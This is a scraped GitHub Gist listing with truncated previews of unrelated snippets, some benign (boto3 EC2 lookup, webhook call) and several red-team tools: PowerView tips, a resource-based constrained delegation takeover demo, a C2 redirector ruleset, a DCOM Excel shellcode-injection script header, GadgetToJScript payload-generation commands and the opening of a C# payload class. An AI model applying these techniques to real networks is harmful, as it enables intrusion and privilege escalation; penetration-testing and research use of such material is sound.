Skip to content

Instantly share code, notes, and snippets.

@alexlauerman
alexlauerman / printableASCII
Created January 22, 2014 23:46
All printable ASCII for Burp Intruder #python >>> import strings >>> for i in string.printable: ... print i
0
1
2
3
4
5
6
7
8
9
@dastergon
dastergon / ec2_info_retriever.py
Last active May 29, 2024 05:17
A basic boto3 based tool for retrieving information from running EC2 instances.
from collections import defaultdict
import boto3
"""
A tool for retrieving basic information from the running EC2 instances.
"""
# Connect to EC2
ec2 = boto3.resource('ec2')
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 18, 2024 07:51
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@ruanbekker
ruanbekker / rocketchat_invoke_webhook_python.py
Created August 2, 2017 23:06
Invoke Rocketchat Incoming Webhook with Python
import requests
import json
uri = 'https://domain.com/hooks/1234AbcD'
data={}
data = {
"username": "Python Bot",
"icon_emoji": ":whale:",
"attachments": [
{
@curi0usJack
curi0usJack / .htaccess
Last active June 6, 2024 18:04
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@HarmJ0y
HarmJ0y / rbcd_demo.ps1
Last active June 8, 2024 18:13
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{
@joswr1ght
joswr1ght / groupenumeration.ps1
Created January 8, 2020 13:08
Create a Collection of Files for Windows Domain Groups with User Members in Each File
Get-AdGroup -Filter * | % { Get-AdGroupMember $_.Name | Select-Object -ExpandProperty SamAccountName | Out-File -FilePath "$($_.Name).txt" -Encoding ASCII }
@3xpl01tc0d3r
3xpl01tc0d3r / GadgetToJScript Command Reference
Last active September 26, 2022 06:02
GadgetToJScript Code
# Command to generate HTA code using GadgetsToJScript
GadgetToJScript.exe -w hta
# Command to generate JS code using GadgetsToJScript
GadgetToJScript.exe -w js
# Command to generate VBS code using GadgetsToJScript
GadgetToJScript.exe -w vbs
# Command to generate VBA code using GadgetsToJScript
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()